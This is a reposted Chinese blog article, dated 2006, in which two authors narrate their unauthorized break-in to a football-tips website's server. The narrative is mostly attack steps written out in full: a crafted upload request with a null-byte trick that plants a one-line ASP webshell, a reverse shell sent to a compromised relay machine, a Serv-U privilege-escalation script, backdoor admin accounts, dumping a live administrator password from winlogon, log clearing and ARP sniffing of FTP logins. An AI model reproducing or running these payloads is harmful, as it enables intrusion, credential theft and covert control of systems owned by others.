分享
 
 
 

一次真实的入侵-------记对一足球推荐站点的渗透

王朝other·作者佚名  2006-01-09
窄屏简体版  字體: |||超大  

一次真实的入侵-------记对一足球推荐站点的渗透

来源: http://www.17nc.com/

由于某些原因!我们要对某足球推荐站点--www.******.com进行渗透,首先当然是踩点了。先用扫描器扫扫。看开什么服务看了下。开21,80,554端口。FTP是serv-u,IIS是6.0的,还有554,嘿嘿,这个服务是什么我忘了。只知道可以溢出,试了下。失败!~!~1没有办法,在回来到他的站点上,到处观察他哪里有漏洞。,或者注入点。找了N久。实在找不出,他功能太少了。利用桂林老兵的工具查他服务器上绑定几个域名,或站点。查出六个。现在的想发就是。找到他们中一个比较弱的来进去。然后打到我们的目的。

很遗憾,他们都是一样的足球推荐站点。而且都上一全方位公司为他们设计的,他们的程序安全性还不错,基本上找不到什么可以利用的地方了。

现在只能用最卑鄙的一招了。arpsniff嗅它他的FTP密码。至于原理我就不在这里多说了。想知道的朋友可以自己去网上看看有关的文章。最成功的例子就是小路写的《黑防主机外部的危险》。

要嗅探,必须进入他们的网关内的机子,而且最好开3389的,用superscan3.0狂扫他们那个网段61.143.****.1-61.143.***.254,可惜。基本上都有防火墙,嘿嘿。防火墙我怕怕。但魔高一尺,道高一丈,呵呵。自然有解决他的方法。专门找开21端口,3389端口和80端口的机子。我扫啊扫啊扫。几乎另我绝望,那个网段活动的主机没有几台,而且好多是linux系统的,拿它无可奈何!~!~!~1

当然,在找漏洞主机的过程是漫长的。遇到好多失败,,,,我现在只说成功的那个,用桂林老兵的工具查到IP为61.143.***.121上有5个站点,(我们的目标IP是61.143.***.108)一个一个试,找SQL注入口,郁闷,几乎都是静态的htm文件。就在我绝望的时候。在网址后面试试http://www.xxx.com/admin出现403错误,嘿嘿。说明存在这个文件夹,admin一般是管理院登陆的地方,凭着经验,试试有没有上传,http://www.xxx.com/admin/uopload.asp嘿嘿,有希望了,

出现Microsoft VBScript 运行时错误 错误 '800a01b6'

对象不支持此属性或方法: 'form'

/admin/upload.asp,行20

说明有这个文件。但这个不可能是他提交的那个而已。于是,试试upload.htm

嘿嘿,出现了可爱的上传页面。看看有没有上传漏洞!~查开源代码

发现有<form name="form" method="post" action="upload.asp" enctype="multipart/form-data" >

<input type="hidden" name="filepath" value="../DA_MUSIC_PIC/" size="20">

<input type="hidden" name="act" value="upload">

嘿嘿。他死定了。上传路径这样定义,经典的上传漏洞!`!~!

离成功不远了。

现在就是老步骤了。抓包,编辑,用NC提交。

我把包的内容说说

POST /admin/upload1.asp HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*

Referer: http://www.***.com/admin/upload1.htm

Accept-Language: zh-cn

Content-Type: multipart/form-data; boundary=---------------------------7d4251a110258

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)

Host: www.haotin.com

Content-Length: 664

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: flux_stat_user=0.18235000 1095404136621813289; ASPSESSIONIDQSBQTDSA=CODBCEJAHFBAFAGNKBPONJKO

-----------------------------7d4251a110258

Content-Disposition: form-data; name="filepath"

../tt90_music_pic/b.asp //这里我多加了b.asp 记得asp 后面有个空格

-----------------------------7d4251a110258

Content-Disposition: form-data; name="act"

upload

-----------------------------7d4251a110258

Content-Disposition: form-data; name="file"; filename="C:\Documents and Settings\SUPPORT_388945a0\桌面\s\ASP木马集合\icyfox007v1.10\asp.jpg" //这里改为他允许上传的文件后缀,

Content-Type: text/html

<SCRIPT RUNAT=SERVER LANGUAGE=javascript>eval(Request.form('830306')+'')</SCRIPT> // 这个是冰湖ASP木马短小就一句话

-----------------------------7d4251a110258

Content-Disposition: form-data; name="Submit"

上传图片

-----------------------------7d4251a110258--

因为我多加了b.asp 六个字节,包括空格所以在Content-Length: 664这里多加了6个字节,

把上面编辑好保存为a.txt然后用UE编辑,把那个空格20改为00就OK了,

然后用NC提交

nc -vv www.xxx.com 80 <a.txt

哈哈提示上传成功。找到我们的木马。用兵湖客户端连上去。在写个海洋ASP木马上去,发现写不进,郁闷啊。环境探测一下。原来不支持FSO,本来想截图的,才发现我把那个木马删去了。

反正就是那个意思了。

下面就探测下他的服务器信息

net start看看开什么服务

已经启动以下 Windows 2000 服务:

Alerter

Automatic updates

Background Intelligent Transfer Service

BlackICE

COM+ Event System

Computer Browser

DHCP Client

Distributed File System

Distributed Link Tracking Client

Distributed Transaction Coordinator

DNS Client

Event Log

IIS Admin Service

IPSEC Policy Agent

License Logging Service

Logical Disk Manager

Messenger

Microsoft Search

MSSQLSERVER

Network Connections

NT LM Security Support Provider

Plug and Play

Print Spooler

Protected Storage

Remote Access Connection Manager

Remote Procedure Call (RPC)

Remote Registry Service

Removable Storage

RunAs Service

Security Accounts Manager

Serv-U FTP 服务器

Server

Symantec AntiVirus

Symantec AntiVirus Definition Watcher

Symantec Event Manager

Symantec Settings Manager

System Event Notification

Task Scheduler

TCP/IP NetBIOS Helper Service

Telephony

Terminal Services

Windows Installer

Windows Management Instrumentation

Windows Management Instrumentation Driver Extensions

Workstation

World Wide Web Publishing Service

命令成功完成。

Serv-U FTP 服务器

Terminal Services

BlackICE

MSSQLSERVER

嘿嘿找到了这几个。我最喜欢 serv-u和Terminal Services

l了

怎么我扫不到3389呢?????难道是防火墙??不可能啊。那他是怎么远程管理的啊》

于是用netstat -an看看开什么端口

Active Connections

Proto Local Address Foreign Address State

TCP 0.0.0.0:80 0.0.0.0:0 LISTENING

TCP 0.0.0.0:135 0.0.0.0:0 LISTENING

TCP 0.0.0.0:445 0.0.0.0:0 LISTENING

TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING

TCP 0.0.0.0:1035 0.0.0.0:0 LISTENING

TCP 0.0.0.0:1180 0.0.0.0:0 LISTENING

TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING

TCP 0.0.0.0:1450 0.0.0.0:0 LISTENING

TCP 0.0.0.0:2387 0.0.0.0:0 LISTENING

TCP 0.0.0.0:2390 0.0.0.0:0 LISTENING

TCP 0.0.0.0:2420 0.0.0.0:0 LISTENING

TCP 0.0.0.0:3061 0.0.0.0:0 LISTENING

TCP 0.0.0.0:3372 0.0.0.0:0 LISTENING

TCP 0.0.0.0:4990 0.0.0.0:0 LISTENING

TCP 0.0.0.0:4991 0.0.0.0:0 LISTENING

TCP 0.0.0.0:8933 0.0.0.0:0 LISTENING

55555555555找不到3389,难道是改端口了??急怀疑8933这个端口

(事后证明的确他把终端服务的端口改为8933 了)

现在就是提升权限了。

因为他有防火墙,所以用端口转serv-u的43958是不可能了。但我们用nc啊,嘿嘿这个号称瑞士军到的小东西!~!~!~

上传到上面。使他运行

nc -e cmd.exe 61.186.254.** 1234

61.186.254.**是我公网IP,(其实是肉鸡了)

这个意思就是要他主动连接我的1234端口,并把cmd.exe重定向到我机子的1234端口上。现在就可以逃开他防火墙了。哈哈。!~!~!得意只作!~!~!

精彩的还在后头,由于我太困了,搞了三个小时了。下午还有客,所以就去休息下。让snake来搞搞

呵呵下面就是他写的了。我走也!!~!~1

二、

charey 睡觉去了~晕~把最简单的部分交给我这个菜鸟做~呵呵~我和他是个宿舍的~和他真的学了不少的东西~嘿嘿~ 去睡觉的时候他告诉我说这台机子开了防火墙~晕~开了这个东西的机子想进去真的有些难~还好最近新出了几个工具~~这台机子开了serv-u 服务,我就从这里入手吧,最近在小凤居出了个新的工具------Serv-u Local Exploit,是fantasy告诉我的~我也没有用过,不知道怎么用~郁闷~~!!!不理他先了~我下载一个下来看看不就知道怎么用了吗~?呵呵~看了他的说明,很简单哦serv-u .exe "command" 其中"command"听说可以以管理员的权限运行命令,嘿嘿,用ASP免FSO的木马把工具传上去,用冰狐的客户端运行他,serv-u.exe "net user kkb$ 830306 /add" 提示成功,嘿嘿,我在提升kkb$为管理员,serv-u.exe "net localgroup administrators kkb$ /add"又提示成功了,好简单就让我完成了,呵呵。fantasy 在去睡觉之前说这台机子还开了3389终端服务,现在什么都OK了,我拿出了3389终端连接器连接上去,晕!!!!!连不上,难道不开??我郁闷,不理它,先传个cmd.asp 上去,运行命令。net start看看开什么服务

已经启动以下 Windows 2000 服务:

………………

………………

Terminal Services

Windows Installer

Windows Management Instrumentation

Windows Management Instrumentation Driver Extensions

Workstation

World Wide Web Publishing Service

Terminal Services这个不是3389的终端服务吗?既然开了,那么一定是改了端口了,不理他,我运行netstat -an 看看他开了什么服务,开的服务如下

…………………………

……………………

TCP 0.0.0.0:80 0.0.0.0:0 LISTENING

TCP 0.0.0.0:4990 0.0.0.0:0 LISTENING

TCP 0.0.0.0:4991 0.0.0.0:0 LISTENING

TCP 0.0.0.0:8933 0.0.0.0:0 LISTENING

这个开的端口就8933很象是连接的端口了,我用3389终端登陆器等上去,呵呵,和我想的一样,果然是8933,二话没说填上kkb$密码830306连接,晕~提示无效用户,我又郁闷~!!!我想是不是serv-u.exe的问题啊~因为毕竟是第一次用啊,可能刚刚没有添加成功。算了,新工具用不了就用nc配合添加serv-u的系统帐号吧,我把NC传上那台机子上面,同时在我的一台肉鸡上运行nc -v -l -p 1234

配合刚刚用的nc -e cmd.exe IP PORT 得到一个guest权限的shell

写一个txt文档,传到他上面,内容如下

USER localadministrator

PASS #l@$ak#.lk;0@P

SITE MAINTENANCE

-SETUSERSETUP

-IP=61.143.251.***

-PortNO=21

-User=kkb

-Password=830306

-HomeDir=c:\-Maintenance=System

-RelPaths=1

Access=c:\|RWAMELCDP

保存为b.txt

添加一个FTP帐号,是系统权限的。再来到刚刚得的那个shell下运行

nc -vv 127.0.0.1 43958 <b.txt

提示

save setting

成功1`!~!用FTP登陆下

进入C盘

为了防止不能添加用户。我采用偷他密码的方法。(有时候他有密码策略,所以会出现添加用户失败)用FTP传pulist.exe和findpass.exe上去。在本地编辑一个bat文件,内容是

c:\winnt\twain_32\pulist.exe >a.txt

把会显的内容写进A.TXT

在FTP里应该这样

ftp>quote site exec a.bat

下载a.txt看看进程和对应的PID值

winlogon.exe 对应的PID值是1252

然后再编辑a.bat

c:\winnt\twain_32\findpass 机器名 管理员名 winlogin.exe的PID值

OK。在下载A。TXT,看到密码了哈哈

To Find Password in the Winlogon process

Usage: c:\winnt\twain_32\findpass.exe DomainName UserName PID-of-WinLogon

The debug privilege has been added to PasswordReminder.

The WinLogon process id is 2512 (0x000009d0).

To find SUPERRRABBIT\D1haokan123.com.net password in process 2512 ...

The encoded password is found at 0x00800800 and has a length of 15.

The logon information is: SUPERRRABBIT/administrator/netChina.com123.

The hash byte is: 0x2a.

密码是netChina.com123

然后就是用他登陆,了。清理日志。然后传嗅探工具arpsniff.exe winpcap.exe

运行

arpsniff 61.143.251.1 61.143.251.** 21 a.txt 0

开始漫长的等待。

由于还没有嗅到密码我就发文章了。呵呵

现在得上去看看得密码没有

呵呵。

还要多谢 sykkk

是他教我们学会嗅探的。

这里没有什么技术可言,都是一些经验。希望能对一些人有帮助。还有,嗅探这招比较毒,如果在我们学校的机子里有一台被拿下的话。其他的主机也有危险。------------------希望网管们注意这个古老的入侵方法,做好防范。

charley & snake1314

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有